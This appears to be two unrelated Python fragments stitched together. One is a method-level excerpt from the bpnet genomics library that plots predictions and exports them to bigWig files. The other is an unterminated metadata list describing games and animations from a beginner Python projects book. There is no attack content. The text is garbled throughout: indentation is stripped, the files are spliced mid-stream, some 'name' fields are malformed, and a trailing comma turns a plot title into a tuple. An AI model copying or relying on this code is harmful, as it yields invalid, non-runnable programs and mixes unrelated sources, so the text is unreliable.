"""
Args:
regions: list of pybedtools.Interval
variant: a single instance or a list bpnet.extractors.Variant
pred_summary: 'mean' or 'max', summary function name for the profile gradients
compute_grads: if False, skip computing gradients
"""
seq = self.get_seq(regions, variants, use_strand=use_strand, fasta_file=fasta_file)
preds = self.predict_all(seq, contrib_method, batch_size, pred_summaries=pred_summaries)
# append regions
for i in range(len(seq)):
preds[i]['interval'] = regions[i]
if variants is not None:
preds[i]['variant'] = variants[i]
return preds
def plot_regions(self, regions, ds=None, variants=None,
seqlets=[],
pred_summary='profile/wn',
contrib_method='grad',
batch_size=128,
# ylim=None,
xlim=None,
# seq_height=1,
rotate_y=0,
add_title=True,
fig_height_per_track=2,
same_ylim=False,
fig_width=20):
"""Plot predictions
Args:
regions: list of pybedtools.Interval
variant: a single instance or a list of bpnet.extractors.Variant
ds: DataSpec. If provided, the ground truth will be added to the plot
pred_summary: 'mean' or 'max', summary function name for the profile gradients
"""
out = self.predict_regions(regions,
variants=variants,
contrib_method=contrib_method,
# pred_summary=pred_summary,
batch_size=batch_size)
figs = []
if xlim is None:
xmin = 0
else:
xmin = xlim[0]
shifted_seqlets = [s.shift(-xmin) for s in seqlets]
for i in range(len(out)):
pred = out[i]
interval = out[i]['interval']
if ds is not None:
obs = {task: ds.task_specs[task].load_counts([interval])[0] for task in self.tasks}
else:
obs = None
title = "{i.chrom}:{i.start}-{i.end}, {i.name} {v}".format(i=interval, v=pred.get('variant', ''))
# handle the DNase case
if isinstance(pred['seq'], dict):
seq = pred['seq']['seq']
else:
seq = pred['seq']
if obs is None:
# TODO - simplify?
viz_dict = OrderedDict(flatten_list([[
(f"{task} Pred", pred['pred'][task]),
(f"{task} Contrib profile", pred['contrib_score'][f"{task}/{pred_summary}"] * seq),
# (f"{task} Contrib counts", sum(pred['grads'][task_idx]['counts'].values()) / 2 * seq),
] for task_idx, task in enumerate(self.tasks)]))
else:
viz_dict = OrderedDict(flatten_list([[
(f"{task} Pred", pred['pred'][task]),
(f"{task} Obs", obs[task]),
(f"{task} Contrib profile", pred['contrib_score'][f"{task}/{pred_summary}"] * seq),
# (f"{task} Contrib counts", sum(pred['grads'][task_idx]['counts'].values()) / 2 * seq),
] for task_idx, task in enumerate(self.tasks)]))
if add_title:
title = "{i.chrom}:{i.start}-{i.end}, {i.name} {v}".format(i=interval, v=pred.get('variant', '')),
else:
title = None
if same_ylim:
fmax = {feature: max([np.abs(viz_dict[f"{task} {feature}"]).max() for task in self.tasks])
for feature in ['Pred', 'Contrib profile', 'Obs']}
ylim = []
for k in viz_dict:
f = k.split(" ", 1)[1]
if "Contrib" in f:
ylim.append((-fmax[f], fmax[f]))
else:
ylim.append((0, fmax[f]))
else:
ylim = None
fig = plot_tracks(filter_tracks(viz_dict, xlim),
seqlets=shifted_seqlets,
title=title,
fig_height_per_track=fig_height_per_track,
rotate_y=rotate_y,
fig_width=fig_width,
ylim=ylim,
legend=True)
figs.append(fig)
return figs
def export_bw(self,
regions,
output_prefix,
fasta_file=None,
contrib_method='grad',
pred_summaries=['profile/wn', 'counts/pre-act'],
batch_size=512,
scale_contribution= False,
flip_negative_strand = False,
chromosomes=None):
"""Export predictions and model contributions to big-wig files
Args:
regions: list of genomic regions
output_prefix: output file prefix
batch_size:
scale_contribution: if True, multiple the contribution scores by the predicted count value
chromosomes: a list of chromosome names consisting a genome
"""
from pysam import FastaFile
# pred_summary: which operation to use for the profile gradients
logger.info("Get model predictions and contribution scores")
out = self.predict_regions(regions,
contrib_method=contrib_method,
pred_summaries=pred_summaries,
fasta_file=fasta_file,
batch_size=batch_size)
#Determine how many strands to write in export-bw
n_tracks = out[0]['pred'][self.tasks[0]].shape[1]
assert n_tracks <= 2, "More than 2 tracks predicted...please evaluate application of exporting bigwig tracks..."
if n_tracks == 1:
output_feats = ['preds', 'contrib.profile', 'contrib.counts']
elif n_tracks == 2:
output_feats = ['preds.pos', 'preds.neg', 'contrib.profile', 'contrib.counts']
logger.info("Setup bigWigs for writing")
# Get the genome lengths
if fasta_file is None:
fasta_file = self.fasta_file
fa = FastaFile(fasta_file)
if chromosomes is None:
genome = OrderedDict([(c, l) for c, l in zip(fa.references, fa.lengths)])
else:
genome = OrderedDict([(c, l) for c, l in zip(fa.references, fa.lengths) if c in chromosomes])
fa.close()
# make sure the regions are in the right order
first_chr = list(np.unique(np.array([interval.chrom for interval in regions])))
last_chr = [c for c, l in genome.items() if c not in first_chr]
genome = [(c, genome[c]) for c in first_chr + last_chr]
# open bigWigs for writing
bws = {}
for task in self.tasks:
bws[task] = {}
for feat in output_feats:
delim = "." if not output_prefix.endswith("/") else ""
bw_preds_pos = pyBigWig.open(f"{output_prefix}{delim}{task}.{feat}.bw", "w")
bw_preds_pos.addHeader(genome)
bws[task][feat] = bw_preds_pos
def add_entry(bw, arr, interval, start_idx=0):
"""Macro for adding an entry to the bigwig file
Args:
bw: pyBigWig file handle
arr: 1-dimensional numpy array
interval: genomic interval pybedtools.Interval
start_idx: how many starting values in the array to skip
"""
assert arr.ndim == 1
assert start_idx < len(arr)
if interval.stop - interval.start != len(arr):
logger.warning(f"interval.stop - interval.start ({interval.stop - interval.start})!= len(arr) ({len(arr)})")
logger.warning(f"Skipping the entry: {interval}")
return
bw.addEntries(interval.chrom, interval.start + start_idx,
values=arr[start_idx:],
span=1, step=1)
def to_1d_contrib(hyp_contrib, seq):
# mask the hyp_contrib + add them up
return (hyp_contrib * seq).sum(axis=-1)
# interval logic to handle overlapping intervals
# assumption: all intervals are sorted w.r.t the start coordinate
# strategy: don't write values at the same position twice (skip those)
#
# graphical representation:
# ... ] - prev_stop
# [ ] - new interval 1
# [ ] - added chunk from interval 1
# [ ] - new interval 2 - skip
# [ ] - new interval 3, fully add
logger.info("Writing to bigWigs")
prev_stop = None # Keep track of what the previous interval already covered
prev_chrom = None
for i in tqdm(range(len(out))):
interval = out[i]['interval']
if prev_chrom != interval.chrom:
# Encountered a new chromosome
prev_stop = 0 # Restart the end-counter
prev_chrom = interval.chrom
if prev_stop >= interval.stop:
# Nothing new to add to that range
continue
start_idx = max(prev_stop - interval.start, 0)
for tid, task in enumerate(self.tasks):
# Write predictions
preds = out[i]['pred'][task]
if n_tracks == 1:
add_entry(bws[task]['preds'], preds[:, 0],
interval, start_idx)
elif n_tracks == 2:
add_entry(bws[task]['preds.pos'], preds[:, 0],
interval, start_idx)
if flip_negative_strand:
add_entry(bws[task]['preds.neg'], preds[:, 1]*-1,
interval, start_idx)
else:
add_entry(bws[task]['preds.neg'], preds[:, 1],
interval, start_idx)
# Get the contribution scores
seq = out[i]['seq']
hyp_contrib = out[i]['contrib_score']
if scale_contribution:
si_profile = preds.sum() # Total number of counts in the region
si_counts = preds.sum()
else:
si_profile = 1
si_counts = 1
# Assertion to prevent multiple nucleotides being encoded at a genomic position.
if not np.all(seq.astype(bool).sum(axis=-1).max() == 1):
continue
if 'profile/wn' in pred_summaries:
add_entry(bws[task]['contrib.profile'],
to_1d_contrib(hyp_contrib[f'{task}/profile'], seq) * si_profile,
interval, start_idx)
if 'counts/pre-act' in pred_summaries:
add_entry(bws[task]['contrib.counts'],
to_1d_contrib(hyp_contrib[f'{task}/count'], seq) * si_counts,
interval, start_idx)
prev_stop = max(interval.stop, prev_stop)
logger.info("Done writing. Closing bigWigs")
# Close all the big-wig files
for task in self.tasks:
for feat in output_feats:
bws[task][feat].close()
logger.info(f"Done! Output files stored as: {output_prefix}{delim}*")
|
469816
|
PROGRAMS = [ { 'desc': 'A time-based quiz game to see how fast you can alphabetize letters.\nTags: short, game, word\n',
'filename': 'alphabetizequiz.py',
'hash': 1042153501,
'name': 'Alphabetize Quiz'},
{ 'desc': 'A deductive logic game where you must guess a number based on clues.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'A version of this game is featured in the book, "Invent Your Own\n'
'Computer Games with Python" https://nostarch.com/inventwithpython\n'
'Tags: short, game, puzzle\n',
'filename': 'bagels.py',
'hash': 411706525,
'name': 'Bagels'},
{ 'desc': 'Explore the surprising probabilities of the "Birthday Paradox".\n'
'More info at https://en.wikipedia.org/wiki/Birthday_problem\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, math, simulation\n',
'filename': 'birthdayparadox.py',
'hash': 3722774204,
'name': 'Birthday Paradox Simulation'},
{ 'desc': 'Displays a text message according to the provided bitmap image.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'bitmapmessage.py',
'hash': 283061086,
'name': 'Bitmap Message'},
{ 'desc': "The classic card game also known as 21. (This version doesn't have\n"
'splitting or insurance.)\n'
'More info at: https://en.wikipedia.org/wiki/Blackjack\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, card game\n',
'filename': 'blackjack.py',
'hash': 2948034624,
'name': 'Blackjack'},
{ 'desc': 'A bouncing dots animation. Press Ctrl-C to stop.\n'
'\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: short, artistic, bext, terminal\n',
'filename': 'bouncingdots.py',
'hash': 1551847665,
'name': 'Bouncing Dots'},
{ 'desc': 'A bouncing line animation. Press Ctrl-C to stop.\n'
'\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, bext, terminal\n',
'filename': 'bouncinglines.py',
'hash': 1609554076,
'name': 'Bouncing Lines'},
{ 'desc': 'The Caesar cipher is a shift cipher that uses addition and subtraction\n'
'to encrypt and decrypt letters.\n'
'More info at: https://en.wikipedia.org/wiki/Caesar_cipher\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: short, beginner, cryptography, math\n',
'filename': 'caesarcipher.py',
'hash': 1651758836,
'name': 'Caesar Cipher'},
{ 'desc': 'This programs hacks messages encrypted with the Caesar cipher by doing\n'
'a brute force attack against every possible key.\n'
'More info at:\n'
'https://en.wikipedia.org/wiki/Caesar_cipher#Breaking_the_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, cryptography, math\n',
'filename': 'caesarhacker.py',
'hash': 225964543,
'name': '<NAME> Hacker'},
{ 'desc': 'Create monthly calendars, saved to a text file and fit for printing.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short\n',
'filename': 'calendarmaker.py',
'hash': 1570317449,
'name': 'Calendar Maker'},
{ 'desc': 'A silly bluffing game between two human players. Based on the game\n'
'from the show, 8 Out of 10 Cats.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, beginner, game, two-player\n',
'filename': 'carrotinabox.py',
'hash': 456063392,
'name': '<NAME>'},
{ 'desc': 'The classic checkers board game. In this version, capturing is mandatory\n'
'and if you are blocked from moving, you lose.\n'
'Tags: extra-large, board game, game, two-player\n',
'filename': 'checkers.py',
'hash': 2959254415,
'name': 'Checkers'},
{ 'desc': 'The traditional Japanese dice game of even-odd.\n'
'View this code athttps://nostarch.com/big-book-small-python-projects\n'
'Tags: short, beginner, game\n',
'filename': 'chohan.py',
'hash': 2580289535,
'name': 'Cho-Han'},
{ 'desc': 'A clickbait headline generator for your soulless content farm website.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, beginner, humor, word\n',
'filename': 'clickbait.py',
'hash': 2336955734,
'name': 'Clickbait Headline Generator'},
{ 'desc': 'Simulate a large number of coin flips.\nTags: tiny, beginner, math, simulation\n',
'filename': 'coinflipsimulator.py',
'hash': 58697995,
'name': 'Coin Flip Simulator'},
{ 'desc': 'Generates numbers for the Collatz sequence, given a starting number.\n'
'More info at: https://en.wikipedia.org/wiki/Collatz_conjecture\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'collatz.py',
'hash': 3033240421,
'name': 'Collatz Sequence'},
{ 'desc': 'The classic cellular automata simulation. Press Ctrl-C to stop.\n'
'More info at: https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, simulation\n',
'filename': 'conwaysgameoflife.py',
'hash': 2738975912,
'name': "Conway's Game of Life"},
{ 'desc': 'Show a countdown timer animation using a seven-segment display.\n'
'Press Ctrl-C to stop.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'Requires sevseg.py to be in the same folder.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'countdown.py',
'hash': 1516595236,
'name': 'Countdown'},
{ 'desc': 'Use multiplication and subtraction to count the number of stars shown\n'
'as fast as possible.\n'
'Tags: short, math\n',
'filename': 'countingquiz.py',
'hash': 2159542432,
'name': 'Counting Quiz'},
{ 'desc': 'An animation of a deep cave that goes forever into the earth.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, scrolling, artistic\n',
'filename': 'deepcave.py',
'hash': 578224852,
'name': 'Deep Cave'},
{ 'desc': 'Draws diamonds of various sizes.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
' /\\ /\\\n'
' / \\ //\\\\\n'
' /\\ /\\ / \\ ///\\\\\\\n'
' / \\ //\\\\ / \\ ////\\\\\\\\\n'
' /\\ /\\ / \\ ///\\\\\\ \\ / \\\\\\\\////\n'
'/ \\ //\\\\ \\ / \\\\\\/// \\ / \\\\\\///\n'
'\\ / \\\\// \\ / \\\\// \\ / \\\\//\n'
' \\/ \\/ \\/ \\/ \\/ \\/\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'diamonds.py',
'hash': 287131560,
'name': '"Diamonds'},
{ 'desc': 'A flash card addition game where you sum the total on random dice rolls.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: large, artistic, game, math\n',
'filename': 'dicemath.py',
'hash': 584226948,
'name': 'Dice Math'},
{ 'desc': 'Simulates dice rolls using the Dungeons & Dragons dice roll notation.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, simulation\n',
'filename': 'diceroller.py',
'hash': 3363022820,
'name': 'Dice Roller'},
{ 'desc': 'Displays a digital clock of the current time with a seven-segment\n'
'display. Press Ctrl-C to stop.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'Requires sevseg.py to be in the same folder.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'digitalclock.py',
'hash': 2446156335,
'name': 'Digital Clock'},
{ 'desc': 'A screensaver in the style of The Matrix movie\'s "digital rain" visuals.\n'
'Tags: tiny, artistic, beginner, scrolling\n',
'filename': 'digitalrain.py',
'hash': 1802911501,
'name': 'Digital Rain'},
{ 'desc': 'A simple animation of a DNA double-helix. Press Ctrl-C to stop.\n'
'Inspired by matoken https://asciinema.org/a/155441\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, scrolling, science\n',
'filename': 'dna.py',
'hash': 1992587247,
'name': 'DNA'},
{ 'desc': 'A screensaver of many many ducklings.\n'
'\n'
'>" ) =^^) (``= ("= >") ("=\n'
'( >) ( ^) (v ) (^ ) ( >) (v )\n'
' ^ ^ ^ ^ ^ ^ ^^ ^^ ^^\n'
'\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, object-oriented, scrolling\n',
'filename': 'ducklings.py',
'hash': 251730393,
'name': 'Duckling Screensaver'},
{ 'desc': 'An art program that draws a continuous line around the screen using the\n'
'WASD keys. Inspired by Etch A Sketch toys.\n'
'\n'
'For example, you can draw Hilbert Curve fractal with:\n'
'SDWDDSASDSAAWASSDSASSDWDSDWWAWDDDSASSDWDSDWWAWDWWASAAWDWAWDDSDW\n'
'\n'
'Or an even larger Hilbert Curve fractal with:\n'
'DDSAASSDDWDDSDDWWAAWDDDDSDDWDDDDSAASDDSAAAAWAASSSDDWDDDDSAASDDSAAAAWA\n'
'ASAAAAWDDWWAASAAWAASSDDSAASSDDWDDDDSAASDDSAAAAWAASSDDSAASSDDWDDSDDWWA\n'
'AWDDDDDDSAASSDDWDDSDDWWAAWDDWWAASAAAAWDDWAAWDDDDSDDWDDSDDWDDDDSAASDDS\n'
'AAAAWAASSDDSAASSDDWDDSDDWWAAWDDDDDDSAASSDDWDDSDDWWAAWDDWWAASAAAAWDDWA\n'
'AWDDDDSDDWWAAWDDWWAASAAWAASSDDSAAAAWAASAAAAWDDWAAWDDDDSDDWWWAASAAAAWD\n'
'DWAAWDDDDSDDWDDDDSAASSDDWDDSDDWWAAWDD\n'
'\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic\n',
'filename': 'etchingdrawer.py',
'hash': 3197123097,
'name': 'Etching Drawer'},
{ 'desc': 'Finds all the factors of a number.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'factorfinder.py',
'hash': 3705722738,
'name': 'Factor Finder'},
{ 'desc': "Test your reflexes to see if you're the fastest draw in the west.\n"
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, game\n',
'filename': 'fastdraw.py',
'hash': 77919149,
'name': 'Fast Draw'},
{ 'desc': 'Calculates numbers of the Fibonacci sequence: 0, 1, 1, 2, 3, 5, 8, 13...\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, math\n',
'filename': 'fibonacci.py',
'hash': 3489339388,
'name': 'Fibonacci Sequence'},
{ 'desc': 'A beautiful animation of fireflies. Press Ctrl-C to stop.\n'
'This program MUST be run in a Terminal/Command Prompt window.\n'
'Tags: large, artistic, bext\n',
'filename': 'fireflies.py',
'hash': 674558448,
'name': 'Fireflies'},
{ 'desc': 'A peaceful animation of a fish tank. Press Ctrl-C to stop.\n'
'Similar to ASCIIQuarium or @EmojiAquarium, but mine is based on an\n'
'older ASCII fish tank program for DOS.\n'
'https://robobunny.com/projects/asciiquarium/html/\n'
'https://twitter.com/EmojiAquarium\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, artistic, bext\n',
'filename': 'fishtank.py',
'hash': 2715470870,
'name': 'Fish Tank'},
{ 'desc': 'Fizz Buzz is a game where you count up from 1, substituting "fizz" for\n'
'multiples of 3, "buzz" for multiples of 5, and "fizzbuzz" for multiples\n'
'of 3 and 5.\n'
'More info at: https://en.wikipedia.org/wiki/Fizz_buzz\n'
'Tags: tiny, beginner, math\n',
'filename': 'fizzbuzz.py',
'hash': 4051036935,
'name': 'Fizz Buzz Calculation'},
{ 'desc': 'A number game where you also race against the clock.\nTags: tiny, beginner, game, math\n',
'filename': 'fizzbuzzgame.py',
'hash': 3733034139,
'name': 'FizzBuzz Game'},
{ 'desc': 'A colorful game where you try to fill the board with a single color. Has\n'
'a mode for colorblind players.\n'
'Inspired by the "Flood It!" game.\n'
'Tags: large, game, bext, terminal\n',
'filename': 'floodplane.py',
'hash': 263543442,
'name': 'Floodplane'},
{ 'desc': 'A screensaver of several different floor painters painting over each\n'
"other's work.\n"
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, simulation, bext, terminal\n',
'filename': 'floorpainters.py',
'hash': 2588220699,
'name': 'Floor Painters animation'},
{ 'desc': 'A simulation of wildfires spreading in a forest. Press Ctrl-C to stop.\n'
"Inspired by <NAME>'s Emoji Sim http://ncase.me/simulating/model/\n"
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, bext, simulation\n',
'filename': 'forestfiresim.py',
'hash': 1053915388,
'name': 'Forest Fire Sim'},
{ 'desc': 'A tile-dropping game to get four in a row, similar to Connect Four.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, board game, two-player\n',
'filename': 'fourinarow.py',
'hash': 821596426,
'name': 'Four in a Row'},
{ 'desc': 'Gomoku is a Japanese board game where two players take turns placing\n'
'tiles. The first player to place five tiles in a row horizontally,\n'
'vertically, or diagonally wins.\n'
'More info at: https://en.wikipedia.org/wiki/Gomoku\n'
'Tags: large, game, board game, two-player\n',
'filename': 'gomoku.py',
'hash': 583266213,
'name': 'Gomoku'},
{ 'desc': 'Try to guess the secret number based on hints.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, game\n',
'filename': 'guess.py',
'hash': 3529806714,
'name': 'Guess the Number'},
{ 'desc': 'How to keep a gullible person busy for hours. (This is a joke program.)\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, humor\n',
'filename': 'gullible.py',
'hash': 1489899546,
'name': 'Gullible'},
{ 'desc': 'The hacking mini-game from "Fallout 3". Find out which seven-letter\n'
'word is the password by using clues each guess gives you.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, game, puzzle\n',
'filename': 'hacking.py',
'hash': 2764413842,
'name': 'Hacking Minigame'},
{ 'desc': 'Guess the letters to a secret word before the hangman is drawn.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, word, puzzle\n',
'filename': 'hangman.py',
'hash': 2061874015,
'name': 'Hangman'},
{ 'desc': 'Displays a simple tessellation of a hexagon grid.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'hexgrid.py',
'hash': 3118128620,
'name': 'Hex Grid'},
{ 'desc': 'An animation of an hourglass with falling sand. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext, simulation\n',
'filename': 'hourglass.py',
'hash': 1363063600,
'name': 'Hourglass'},
{ 'desc': 'Escape the hungry robots by making them crash into each other.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game\n',
'filename': 'hungryrobots.py',
'hash': 3223766853,
'name': 'Hungry Robots'},
{ 'desc': 'A mystery game of intrigue and a missing cat.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, game, humor, puzzle\n',
'filename': 'jaccuse.py',
'hash': 3367713448,
'name': "J'ACCUSE!"},
{ 'desc': 'A cellular automata animation. Press Ctrl-C to stop.\n'
'More info: https://en.wikipedia.org/wiki/Langton%27s_ant\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext, simulation\n',
'filename': 'langtonsant.py',
'hash': 270154230,
'name': "Langton's Ant"},
{ 'desc': 'Watch grass get cut and grow again. Press Ctrl-C to stop.\n'
'Inspired by Tondeuse by <NAME>, https://asciinema.org/a/21743\n'
'https://bitbucket.org/jvillard/tondeuse/src/default/\n'
'Tags: large, artistic, bext\n',
'filename': 'lawnmower.py',
'hash': 3253321659,
'name': 'Lawn Mower'},
{ 'desc': 'Translates English messages into l33t5p34]<.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, word\n',
'filename': 'leetspeak.py',
'hash': 1037849542,
'name': 'Leetspeak'},
{ 'desc': 'Try to find your lost kitten Zophie by moving around the neighborhood\n'
"streets and avenues. You'll get hints at how near or far she is.\n"
'This game teaches cartesian coordinates, cardinal directions, and\n'
'the Pythagorean Theorem.\n'
'Tags: large, game\n',
'filename': 'lostkitty.py',
'hash': 943287447,
'name': 'Lost Kitty'},
{ 'desc': 'A "press your luck" game where you roll dice to gather as many stars\n'
'as possible. You can roll as many times as you want, but if you roll\n'
'three skulls you lose all your stars.\n'
'\n'
'Inspired by the Zombie Dice game from <NAME>.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, multiplayer\n',
'filename': 'luckystars.py',
'hash': 780779378,
'name': 'Lucky Stars'},
{ 'desc': 'Ask a yes/no question about your future. Inspired by the Magic 8 Ball.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, humor\n',
'filename': 'magicfortuneball.py',
'hash': 2489922197,
'name': 'Magic Fortune Ball'},
{ 'desc': 'Place numbers in a hexagon so each row adds up to 38.\n'
'More info at https://en.wikipedia.org/wiki/Magic_hexagon\n'
'More info at https://www.youtube.com/watch?v=ZkVSRwFWjy0\n'
'Tags: large, board game, game, puzzle\n',
'filename': 'magichexagon.py',
'hash': 3356236025,
'name': '<NAME>'},
{ 'desc': 'The ancient seed-sowing game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, board game, game, two-player\n',
'filename': 'mancala.py',
'hash': 1205623725,
'name': 'Mancala'},
{ 'desc': 'Make mazes with the recursive backtracker algorithm.\n'
'\n'
'An animated demo: https://scratch.mit.edu/projects/17358777/\n'
'Tags: large, maze\n',
'filename': 'mazemakerrec.py',
'hash': 4148220427,
'name': 'Maze Maker'},
{ 'desc': 'Move around a maze and try to escape. Maze files are generated by\n'
'mazemakerrec.py.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, maze\n',
'filename': 'mazerunner2d.py',
'hash': 1230953144,
'name': 'Maze Runner 2D'},
{ 'desc': 'Move around a maze and try to escape... in 3D!\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, artistic, maze, game\n',
'filename': 'mazerunner3d.py',
'hash': 1239110670,
'name': 'Maze 3D'},
{ 'desc': 'Scrambles the middle letters of words, but not the first and last\n'
'letters.\n'
'Tags: tiny, beginner, word\n',
'filename': 'middleletterscrambler.py',
'hash': 3283455795,
'name': 'Middle Letter Scrambler'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'A simulation of one million dice rolls.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math, simulation\n',
'filename': 'milliondicestats.py',
'hash': 871470860,
'name': '"""Million Dice Roll Statistics Simulator\n'},
{ 'desc': 'Randomly generates art in the style of Piet Mondrian.\n'
'More info at: https://en.wikipedia.org/wiki/Piet_Mondrian\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext\n',
'filename': 'mondrian.py',
'hash': 435188245,
'name': 'Mondrian Art Generator'},
{ 'desc': 'A simulation of the Monty Hall game show problem.\n'
'More info at https://en.wikipedia.org/wiki/Monty_Hall_problem\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, math, simulation\n',
'filename': 'montyhall.py',
'hash': 3992505208,
'name': 'The Monty Hall Problem'},
{ 'desc': 'Translates between English and Morse Code.\n'
'More info at: https://en.wikipedia.org/wiki/Morse_code\n'
'Tags: short, word\n',
'filename': 'morsecode.py',
'hash': 4098290364,
'name': 'Morse Code'},
{ 'desc': 'Print a multiplication table.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'multiplicationtable.py',
'hash': 3650356333,
'name': 'Multiplication Table'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'Print the full lyrics to one of the longest songs ever! Press\n'
'Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, scrolling\n',
'filename': 'ninetyninebottles.py',
'hash': 4042967348,
'name': '"""Ninety-Nine Bottles of Milk on the Wall\n'},
{ 'desc': 'By <NAME> al@<EMAIL>withpython.com\n'
'Print the full lyrics to one of the longest songs ever! The song\n'
'gets sillier and sillier with each verse. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, scrolling, word\n',
'filename': 'ninetyninebottles2.py',
'hash': 2733381554,
'name': '"""niNety-nniinE BoOttels of Mlik On teh waLl\n'},
{ 'desc': 'Shows equivalent numbers in decimal, hexadecimal, and binary.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, math\n',
'filename': 'numeralsystems.py',
'hash': 2069472375,
'name': 'Numeral System Counters'},
{ 'desc': 'A sliding tile puzzle game to move cars out of the way.\n'
"Inspired by <NAME>'s Rush Hour.\n"
'parkingvaletpuzzle.txt generated from puzzles by <NAME>man.\n'
'Download it from https://inventwithpython.com/parkingvaletpuzzles.txt\n'
'More info at https://www.michaelfogleman.com/rush/\n'
'Tags: large, board game, game, puzzle\n',
'filename': 'parkingvalet.py',
'hash': 1561926268,
'name': 'Parking Valet'},
{ 'desc': 'A single-player, peg-jumping game to eliminate all the pegs.\n'
'More info at https://en.wikipedia.org/wiki/Peg_solitaire\n'
'Tags: large, game, board game\n',
'filename': 'pegsolitaire.py',
'hash': 3263636572,
'name': 'Peg Solitaire'},
{ 'desc': 'Displays atomic information for all the elements.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, science\n',
'filename': 'periodictable.py',
'hash': 1324110721,
'name': 'Periodic Table of Elements'},
{ 'desc': 'Translates English messages into Igpay Atinlay.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, word\n',
'filename': 'piglatin.py',
'hash': 24373794,
'name': 'Pig Latin'},
{ 'desc': 'A simulation of the lottery so you can experience the thrill of\n'
'losing the lottery without wasting your money.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, humor, simulation\n',
'filename': 'powerballlottery.py',
'hash': 584110175,
'name': 'Powerball Lottery'},
{ 'desc': 'Calculates prime numbers, which are numbers that are only evenly\n'
'divisible by one and themselves. They are used in a variety of practical\n'
'applications.\n'
'More info at: https://en.wikipedia.org/wiki/Prime_number\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, math, scrolling\n',
'filename': 'primenumbers.py',
'hash': 644896521,
'name': 'Prime Numbers'},
{ 'desc': 'A sample progress bar animation that can be used in other programs.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, module\n',
'filename': 'progressbar.py',
'hash': 1737609597,
'name': 'Progress Bar Simulation'},
